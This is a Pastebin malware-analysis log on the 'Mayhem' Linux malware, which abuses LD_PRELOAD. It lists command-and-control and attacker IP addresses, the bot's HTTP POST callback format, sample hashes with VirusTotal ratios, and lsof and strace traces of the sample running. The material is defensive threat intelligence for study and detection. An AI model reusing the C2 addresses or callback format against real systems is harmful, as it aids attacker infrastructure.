Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # MalwareMUSTDie! Mayhem (.so ELF malware abusing LD_PRELOAD) installer
- # Case spotted & captured by @yinX, analyzed : @unixfreaxjp
- # CNC: 176.119.3.242||58271 | 176.119.3.0/24 | AS | UA | ONLINE.ORG.UA | FOP GUBINA LUBOV PETRIVNA
- # Attacker Source;
- $ echo 46.149.111.171 |bash origin.sh
- 46.149.111.171||61214 | 46.149.111.0/24 | VDSINSIDE | UA | VDSINSIDE.COM | ELERIUM LTD
- $
- $ echo 188.165.217.216 |bash origin.sh
- 188.165.217.216|ns312431.ip-188-165-217.eu.|16276 | 188.165.0.0/16 | OVH | FR | OVH.COM | OVH SAS
- $
- $ echo 176.119.3.242 |bash origin.sh
- 176.119.3.242||58271 | 176.119.3.0/24 | AS | UA | ONLINE.ORG.UA | FOP GUBINA LUBOV PETRIVNA
- # callback format:
- POST /cupids_banner/cupids.php HTTP/1.0
- Host: lovecupidonline.info
- Pragma: 1337
- #Detection ratio in Virus Total (noted, it is NOT Windows binary, detection ratio for these are VERY reliable actual figure)
- PHP installer: (6/54) 03c80f6d678857431645e079eeacb21cbe4e37f1a4643814dd7ad67a926d8c2a
- ELF bruteforce.so: (2/54) 3ec6f7201d8578b2befb55652a2c9df25ed0e62ffd8e38f8d9bea23bebfdcf3c
- ELF cmsurls.so: (2/54) 3d07e0fb23d0e498b25bca7f4dd696cf507763242725e98b92178332a112bc36
- ELF atom-aggregator-32.so (16/54) 8983f3a07236bcf24f8db4c4c0cec1ad0042806cbf431500867da01c2f4619d4
- ELF atom-aggregator-64.so (14/54) 77d77eed0cad458fd1f3278d5bb93b8e7073d87f855c9e811cec66abad428b53
- // dropped malware drive:
- -rw-r--r-- 1 12582912 Aug 5 10:25 .cache 74fb94dcf856dbe4e848dbcedb51c419
- #fail in decrypting...
- // samples:
- MD5 (atom-aggregator-32.so) = 61092c67dd76505ed23434fdad14f26a (this binary analysis)
- MD5 (atom-aggregator-64.so) = af680d137d3fb407ef654a98e2ac7643 (this binary analysis)
- MD5 (bruteforce.so) = ab69765fadcec09e44cc0df06653982e ==> bruters, self explanatory
- MD5 (cmsurls.so) = 720bc891a7468ef5c29eb4da211c142b ==> callbacks: https://gist.github.com/Yinette/082d616453ca574c6a7b
- // executed, PoC:
- mmd@1x111 ~/0x02E/009 $ date
- Tue Aug 5 10:27:46 CEST 2014
- $ lsof |grep atom
- host 18153 mmd DEL REG 9,2 30149145 /home/mmd/0x02E/009/atom-aggregator-64.so
- $ lsof -p 18153
- COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
- host 18153 mmd cwd DIR 9,2 4096 30148960 /home/mmd/0x02E/009
- host 18153 mmd rtd DIR 9,2 4096 2 /
- host 18153 mmd txt REG 9,2 117128 12453326 /usr/bin/host
- host 18153 mmd mem REG 9,2 22928 38797877 /lib/x86_64-linux-gnu/libnss_dns-2.13.so
- host 18153 mmd mem REG 9,2 47616 38797878 /lib/x86_64-linux-gnu/libnss_files-2.13.so
- host 18153 mmd mem REG 9,2 12582912 30149146 /home/mmd/0x02E/009/.cache
- host 18153 mmd mem REG 9,2 93208 12455541 /usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so
- host 18153 mmd mem REG 9,2 530736 38797873 /lib/x86_64-linux-gnu/libm-2.13.so
- host 18153 mmd mem REG 9,2 141784 38797700 /lib/x86_64-linux-gnu/liblzma.so.5.0.0
- host 18153 mmd mem REG 9,2 18672 38797775 /lib/x86_64-linux-gnu/libattr.so.1.1.0
- host 18153 mmd mem REG 9,2 34840 12456099 /usr/lib/libisccc.so.80.0.2
- host 18153 mmd mem REG 9,2 92752 38797727 /lib/x86_64-linux-gnu/libz.so.1.2.7
- host 18153 mmd mem REG 9,2 80712 38797886 /lib/x86_64-linux-gnu/libresolv-2.13.so
- host 18153 mmd mem REG 9,2 14320 38797702 /lib/x86_64-linux-gnu/libkeyutils.so.1.4
- host 18153 mmd mem REG 9,2 35400 12455796 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
- host 18153 mmd mem REG 9,2 14672 38797691 /lib/x86_64-linux-gnu/libcom_err.so.2.1
- host 18153 mmd mem REG 9,2 162632 12455436 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
- host 18153 mmd mem REG 9,2 868096 12455510 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
- host 18153 mmd mem REG 9,2 219192 12451949 /usr/lib/libGeoIP.so.1.4.8
- host 18153 mmd mem REG 9,2 1599536 38797824 /lib/x86_64-linux-gnu/libc-2.13.so
- host 18153 mmd mem REG 9,2 1436984 12455509 /usr/lib/x86_64-linux-gnu/libxml2.so.2.8.0
- host 18153 mmd mem REG 9,2 131107 38797884 /lib/x86_64-linux-gnu/libpthread-2.13.so
- host 18153 mmd mem REG 9,2 17112 38797717 /lib/x86_64-linux-gnu/libcap.so.2.22
- host 18153 mmd mem REG 9,2 14768 38797839 /lib/x86_64-linux-gnu/libdl-2.13.so
- host 18153 mmd mem REG 9,2 368072 12453396 /usr/lib/libisc.so.84.1.0
- host 18153 mmd mem REG 9,2 139616 12452611 /usr/lib/libisccfg.so.82.0.3
- host 18153 mmd mem REG 9,2 51048 12452613 /usr/lib/libbind9.so.80.0.7
- host 18153 mmd mem REG 9,2 2048480 12455516 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
- host 18153 mmd mem REG 9,2 257288 12455485 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
- host 18153 mmd mem REG 9,2 1674552 12452609 /usr/lib/libdns.so.88.1.1
- host 18153 mmd mem REG 9,2 75752 12455394 /usr/lib/liblwres.so.80.0.3
- host 18153 mmd DEL REG 9,2 30149145 /home/mmd/0x02E/009/atom-aggregator-64.so
- host 18153 mmd mem REG 9,2 136936 38797728 /lib/x86_64-linux-gnu/ld-2.13.so
- host 18153 mmd 0r CHR 1,3 0t0 1027 /dev/null
- host 18153 mmd 1r CHR 1,3 0t0 1027 /dev/null
- host 18153 mmd 2r CHR 1,3 0t0 1027 /dev/null
- host 18153 mmd 3r CHR 1,3 0t0 1027 /dev/null
- // patch to debug:
- execve("/usr/bin/host", ["/usr/bin/host"], [/* 20 vars */]) = 0
- brk(0) = 0x7f57dd0d4000
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0bf000
- open("./atom-aggregator-64.so", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0x\23\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=27272, ...}) = 0
- getcwd("/home/mmd/0x02E/009", 128) = 20
- mmap(NULL, 2151928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57dac94000
- mprotect(0x7f57dac9b000, 2093056, PROT_NONE) = 0
- mmap(0x7f57dae9a000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7f57dae9a000
- mmap(0x7f57dae9b000, 26104, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57dae9b000
- mprotect(0x7fff5d64a000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|PROT_GROWSDOWN) = 0
- close(3) = 0
- access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
- open("/etc/ld.so.cache", O_RDONLY) = 3
- fstat(3, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
- mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f57db0b1000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/liblwres.so.80", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P6\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=75752, ...}) = 0
- mmap(NULL, 2171040, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57daa81000
- mprotect(0x7f57daa93000, 2093056, PROT_NONE) = 0
- mmap(0x7f57dac92000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x11000) = 0x7f57dac92000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libdns.so.88", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\220\244\2\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=1674552, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0b0000
- mmap(NULL, 3773136, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da6e7000
- mprotect(0x7f57da879000, 2093056, PROT_NONE) = 0
- mmap(0x7f57daa78000, 32768, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x191000) = 0x7f57daa78000
- mmap(0x7f57daa80000, 720, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57daa80000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\266\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=257288, ...}) = 0
- mmap(NULL, 2353120, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da4a8000
- mprotect(0x7f57da4e4000, 2097152, PROT_NONE) = 0
- mmap(0x7f57da6e4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3c000) = 0x7f57da6e4000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\207\7\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=2048480, ...}) = 0
- mmap(NULL, 4158808, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da0b0000
- mprotect(0x7f57da27a000, 2097152, PROT_NONE) = 0
- mmap(0x7f57da47a000, 172032, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7f57da47a000
- mmap(0x7f57da4a4000, 13656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57da4a4000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libbind9.so.80", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340-\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=51048, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0af000
- mmap(NULL, 2146352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9ea3000
- mprotect(0x7f57d9eaf000, 2093056, PROT_NONE) = 0
- mmap(0x7f57da0ae000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xb000) = 0x7f57da0ae000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libisccfg.so.82", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\355\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=139616, ...}) = 0
- mmap(NULL, 2238208, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9c80000
- mprotect(0x7f57d9c9b000, 2097152, PROT_NONE) = 0
- mmap(0x7f57d9e9b000, 28672, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b000) = 0x7f57d9e9b000
- mmap(0x7f57d9ea2000, 1792, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d9ea2000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libisc.so.84", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360\374\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=368072, ...}) = 0
- mmap(NULL, 2464112, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9a26000
- mprotect(0x7f57d9a7e000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d9c7d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x57000) = 0x7f57d9c7d000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340\r\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=14768, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ae000
- mmap(NULL, 2109696, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9822000
- mprotect(0x7f57d9824000, 2097152, PROT_NONE) = 0
- mmap(0x7f57d9a24000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d9a24000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libcap.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\220\26\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=17112, ...}) = 0
- mmap(NULL, 2112384, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d961e000
- mprotect(0x7f57d9622000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d9821000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7f57d9821000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@\\\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0755, st_size=131107, ...}) = 0
- mmap(NULL, 2208672, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9402000
- mprotect(0x7f57d9419000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d9618000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16000) = 0x7f57d9618000
- mmap(0x7f57d961a000, 13216, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d961a000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libxml2.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0`\377\2\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=1436984, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ad000
- mmap(NULL, 3537400, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d90a2000
- mprotect(0x7f57d91f7000, 2097152, PROT_NONE) = 0
- mmap(0x7f57d93f7000, 40960, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x155000) = 0x7f57d93f7000
- mmap(0x7f57d9401000, 2552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d9401000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
- mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d8d17000
- mprotect(0x7f57d8e99000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d9098000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7f57d9098000
- mmap(0x7f57d909d000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d909d000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libGeoIP.so.1", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0c\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=219192, ...}) = 0
- mmap(NULL, 2314592, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d8ae1000
- mprotect(0x7f57d8b15000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d8d14000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x33000) = 0x7f57d8d14000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libkrb5.so.3", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\20\310\1\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=868096, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ac000
- mmap(NULL, 2963968, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d880d000
- mprotect(0x7f57d88d6000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d8ad5000, 49152, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xc8000) = 0x7f57d8ad5000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libk5crypto.so.3", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360H\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=162632, ...}) = 0
- mmap(NULL, 2261424, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d85e4000
- mprotect(0x7f57d860a000, 2097152, PROT_NONE) = 0
- mmap(0x7f57d880a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7f57d880a000
- mmap(0x7f57d880c000, 432, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d880c000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libcom_err.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\26\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=14672, ...}) = 0
- mmap(NULL, 2109928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d83e0000
- mprotect(0x7f57d83e3000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d85e2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d85e2000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/x86_64-linux-gnu/libkrb5support.so.0", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240%\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=35400, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ab000
- mmap(NULL, 2130800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d81d7000
- mprotect(0x7f57d81df000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d83de000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7000) = 0x7f57d83de000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libkeyutils.so.1", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\22\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=14320, ...}) = 0
- mmap(NULL, 2109456, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7fd3000
- mprotect(0x7f57d7fd6000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d81d5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d81d5000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libresolv.so.2", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\3008\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=80712, ...}) = 0
- mmap(NULL, 2185864, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7dbd000
- mprotect(0x7f57d7dd0000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d7fcf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x12000) = 0x7f57d7fcf000
- mmap(0x7f57d7fd1000, 6792, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d7fd1000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libz.so.1", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340#\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=92752, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0aa000
- mmap(NULL, 2187792, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7ba6000
- mprotect(0x7f57d7bbc000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d7dbb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15000) = 0x7f57d7dbb000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/usr/lib/libisccc.so.80", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320'\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=34840, ...}) = 0
- mmap(NULL, 2130208, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d799d000
- mprotect(0x7f57d79a5000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d7ba4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7000) = 0x7f57d7ba4000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libattr.so.1", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000\25\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=18672, ...}) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a9000
- mmap(NULL, 2113880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7798000
- mprotect(0x7f57d779c000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d799b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7f57d799b000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/liblzma.so.5", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360,\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=141784, ...}) = 0
- mmap(NULL, 2236904, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7575000
- mprotect(0x7f57d7597000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d7796000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x21000) = 0x7f57d7796000
- close(3) = 0
- access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
- open("/lib/x86_64-linux-gnu/libm.so.6", O_RDONLY) = 3
- read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360>\0\0\0\0\0\0"..., 832) = 832
- fstat(3, {st_mode=S_IFREG|0644, st_size=530736, ...}) = 0
- mmap(NULL, 2625768, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d72f3000
- mprotect(0x7f57d7374000, 2093056, PROT_NONE) = 0
- mmap(0x7f57d7573000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x80000) = 0x7f57d7573000
- close(3) = 0
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a8000
- mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a7000
